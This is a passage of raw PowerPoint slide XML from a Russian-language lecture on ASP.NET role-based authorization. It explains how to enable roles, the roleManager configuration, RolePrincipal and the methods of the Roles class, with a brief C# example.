          <p:cNvPr id="11268" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="838200"/>
            <a:ext cx="9144000" cy="6026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ru-RU" sz="4000" smtClean="0"/>
              <a:t>Подключение ролей для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>приложения</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Подключить роли можно либо с помощью задания </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Enable Roles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>для данного </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Web Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>при выполнении </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Security Setup Wizard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>или выбрав ссылку</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> Enable Roles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>в панели</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>инструмента </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>WAT.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>В любом случае в конфигурационный файл добавляются следующие параметры</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>&lt;roleManager enabled="true" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;authentication mode="Forms" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;/system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;/configuration&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="240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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Когда </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>подключен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>, RoleManagerModule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>автоматически создает экземпляр </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>RolePrincipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>, который содержит как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>identity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>аутентифицированного пользователя, так и роли пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>RolePrincipal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>является просто реализацией интерфейса </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IPrincipal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>который является базовым интерфейсом для всех </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>principal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>классов.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>И следовательно поддерживает всю функциональность, такую как получение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>identity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>пользователя и метод проверки принадлежности пользователя заданной роли с помощью метода</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> IsInRole(). </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Кроме этого он использует пару дополнительных свойств для получения дополнительной информации о </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>principal.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Эти свойства можно использовать для получения информации из экземпляра, а также выполнения проверки авторизации вызывая метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IsInRole()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>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274638"/>
            <a:ext cx="8229600" cy="777875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Статический класс </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0066FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Roles</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0066FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1268413"/>
            <a:ext cx="8362950" cy="5329237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Основные методы:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>CreateRole(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>roleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>добавить новую роль в системе;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>DeleteRole(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>roleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>удалить роль из системы;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>AddUserToRole(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" i="1" smtClean="0"/>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" i="1" smtClean="0"/>
              <a:t>roleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>) – добавить пользователя к роли (задать роль пользователя);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IsUserInRole(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>roleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>) / IsUserInRole(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>roleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>проверить, обладает ли пользователь заданной ролью (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>true – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>да; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>false - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>нет)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>GetAllRoles() – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>массив всех ролей в системе</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>GetRolesForUser() / GetRolesForUser(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>массив всех ролей зарегистрированного / заданного пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>if (!Roles.IsUserInRole(EveryoneRoleName) &amp;&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Roles.RoleExists(EveryoneRoleName))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Roles.AddUserToRole(User.Identity.Name,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>EveryoneRoleName);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1341438"/>
            <a:ext cx="8291513" cy="5516562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>AddUserToRole – добавляет заданного пользователя (user name) к заданной роли (role name); параметры имеют тип </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>CreateRole </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>создание новой роли.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>DeleteRole – удаление существующей роли.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>FindUsersInRole – принимает строку с именем роли и шаблон строки для имени пользователя. Возвращает список пользователей, которые связаны с данной ролью и соответствуют заданному шаблону (usernameToMatch).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>IsUserInRole – возвращает true, если заданный пользователь является членом заданной роли.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>RemoveUserFromRole – удалаеят пользователя из заданной роли.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>RoleExists – возвращает true, если заданная роль существует.</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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="2116138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="17463" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" b="1" smtClean="0"/>
              <a:t>Разработка </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" b="1" smtClean="0"/>
              <a:t>приложения с использованием аутентификации и авторизации</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274638"/>
            <a:ext cx="8229600" cy="777875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108547" name="Picture 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="2590800"/>
            <a:ext cx="6697662" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108548" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="1196975"/>
            <a:ext cx="8137525" cy="1517650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> Для использования этой инфраструктуры вначале необходимо ее подключить. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> Это можно сделать или установив поле </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Enable Roles for This Web Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>при выполнении шагов в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Security Setup Wizard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>или сделав щелчок на ссылке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Enable Roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>в панели Security программы WAT. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
